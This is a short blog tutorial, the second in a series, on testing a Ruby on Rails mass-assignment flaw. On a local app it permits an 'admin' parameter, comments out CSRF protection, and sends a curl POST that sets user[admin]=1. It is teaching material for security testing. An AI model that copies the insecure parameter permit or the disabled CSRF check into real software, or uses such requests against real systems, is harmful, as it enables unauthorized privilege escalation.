Simple Ruby on Rails Mass Assignment Testing Part II : Through Post Request


Continue from Part I , I am going to show how a hacker can exploit a mass-assignment vulnerability through unauthorized POST request.

Open your rails application, add make sure the users_controller look like this:

1
2
3
4
5
6
7
 def user_params


      params.require(:user).permit(:name,:admin)


 end

So the admin paramter is permmited.

Now go to your application.rb file, and comment out this line:

1
2
3
4
5
6
7
8
9
10
class ApplicationController < ActionController::Base


  # Prevent CSRF attacks by raising an exception.


  # For APIs, you may want to use :null_session instead.

  #protect_from_forgery with: :exception
end

Rails has a default protection method to prevent  CSRF attacks, so your application won’t accept any post request without an site-generated authentication token. (It is good to know that you are protected!). And DON’T  ever comment out this line in your production. We are ingoring this protection layer just for a proof of concept.

Now open up your terminl, and do

 curl --request POST --globoff 'http://localhost:3000/users' -d 'user[name]=massass&user[admin]=1'

We send a POST request through curl, and set the admin to 1. Open up our application in the browse, you will see,

This concludes today’s post.

« Simple Ruby On Rails Mass Assignment Testing Part I : Through Browser Concole OOP and Access Control Tutorial II: Protected »